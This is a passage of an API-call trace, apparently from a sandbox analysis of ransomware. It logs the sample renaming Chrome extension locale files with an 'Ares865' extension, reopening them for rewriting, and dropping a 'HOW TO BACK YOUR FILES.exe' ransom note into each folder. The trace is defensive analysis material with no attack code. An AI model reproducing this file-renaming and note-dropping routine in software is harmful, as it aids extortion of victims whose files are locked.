param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.Ares865") returned 160 [0102.322] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.324] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=235) returned 1 [0102.327] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko" [0102.327] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko" [0102.327] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.327] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.328] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.328] GetLastError () returned 0x0 [0102.328] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.328] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8418e910, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e9ea460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e9ea460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.328] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.328] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.329] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.329] lstrlenW (lpString="messages.json") returned 13 [0102.329] lstrlenW (lpString="Ares865") returned 7 [0102.329] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.329] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.Ares865") returned 160 [0102.329] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.330] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.331] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=224) returned 1 [0102.333] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja" [0102.334] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja" [0102.334] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.334] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.334] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.334] GetLastError () returned 0x0 [0102.335] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.335] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841873e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea105c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea105c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.335] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.335] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.335] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.335] lstrlenW (lpString="messages.json") returned 13 [0102.335] lstrlenW (lpString="Ares865") returned 7 [0102.335] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.335] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.Ares865") returned 160 [0102.335] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.337] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=245) returned 1 [0102.340] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it" [0102.340] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it" [0102.340] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.340] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.341] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.341] GetLastError () returned 0x0 [0102.341] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.341] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8417feb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea105c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea105c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.341] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.341] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.341] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.341] lstrlenW (lpString="messages.json") returned 13 [0102.342] lstrlenW (lpString="Ares865") returned 7 [0102.342] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.342] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.Ares865") returned 160 [0102.342] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.343] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=215) returned 1 [0102.356] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id" [0102.356] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id" [0102.356] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.356] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.357] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.357] GetLastError () returned 0x0 [0102.358] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.358] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84176270, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea105c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea105c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.358] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.358] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.358] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.358] lstrlenW (lpString="messages.json") returned 13 [0102.358] lstrlenW (lpString="Ares865") returned 7 [0102.358] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.358] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.Ares865") returned 160 [0102.358] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.360] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=216) returned 1 [0102.364] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu" [0102.364] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu" [0102.364] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.364] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.365] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.365] GetLastError () returned 0x0 [0102.365] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.365] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84171450, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea105c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea105c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.366] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.366] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.366] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.366] lstrlenW (lpString="messages.json") returned 